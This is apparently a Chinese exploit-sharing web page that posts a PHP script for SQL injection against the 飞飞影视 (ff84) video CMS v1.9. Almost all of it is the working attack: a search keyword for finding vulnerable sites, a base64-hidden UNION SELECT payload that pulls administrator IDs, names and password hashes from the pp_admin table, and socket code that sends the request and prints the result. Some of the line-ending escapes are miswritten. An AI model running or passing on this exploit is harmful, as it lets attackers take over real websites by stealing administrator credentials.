飞飞影视系统PHP版 v1.9 injection exploit

  • A+
所属分类:漏洞时代
<?php 
/** 
* 飞飞影视管理系统 SQL injection 
* 飞飞影视系统PHP版 v1.9 injection exploit
* by:www.08sec.com fans 
* keyword "Powered by www.ff84.com" 
*/ error_reporting(E_ERROR); set_time_limit(0);  if ($argc<3) { print_r('
------------------------------------------------------ 
Usage: php '.$argv[0].
host path host: 
target server (ip/hostname),without"http://" 
path:path to ff84cms 
Example: 
php '.$argv[0].' localhost / 
------------------------------------------------------- 
');
die; }  $host=$argv[1]; $path=$argv[2]; $html='';  $cookie=""; $agent=" User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1"; $content=""; $data= "POST /?s=vod-read-id-1".base64_decode('JTIwYW5kJTIwMT0yJTIwdW5pb24lMjBzZWxlY3QlMjAxLDIsMyw0LDUsNiw3LDgsOSwxMCwxMSwxMiwxMywxNCwxNSwxNiwxNywxOCwxOSwyMCwyMSwyMiwyMywyNCwyNSwyNixjb25jYXQoMHg0MCxhZG1pbl9pZCwweDQwLGFkbWluX25hbWUsMHg0MCxhZG1pbl9wd2QsMHg0MCksMjgsMjklMjBmcm9tJTIwcHBfYWRtaW4tLQ==')."html HTTP/1.1/r/n"; $data.= "Host: ".$host."/r/n"; //$data .="Cookie: ".$cookie."/r/n"; $data.= "User-Agent: ".$agent. "/r/n"; $data.= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8/r/n"; $data.= "Accept-Language: zh-cn,zh;q=0.5/r/n"; $data.= "Accept-Encoding: gzip,deflate/r/n";$data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7/r/n"; $data.= "Connection: keep-alive/r/n"; $data.= "Content-Type: application/x-www-form-urlencoded/r/n"; $data.= "Content-Length: ".strlen($content)."/r/n/r/n"; $data.= $content."/r/n";  Sendpack($data);  if (!eregi("Tpl",$html)){ // echo $packet."/r/n"; // echo $html."/r/n"; die("Exploit failed..."); }else{ $pattern="/@(.*)@/i"; preg_match($pattern,$html,$pg); echo"$pg[1]/r/n/r/n"; echo"/r/nExploit succeeded.../r/n"; }  Function sendpack ($packet) { global $host, $html; $ock=fsockopen(gethostbyname($host),'80'); if (!$ock) { echo'No response from '.$host; die; } fputs($ock,$packet); $html=''; while (!feof($ock)) { $html.=fgets($ock); } fclose($ock); }

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: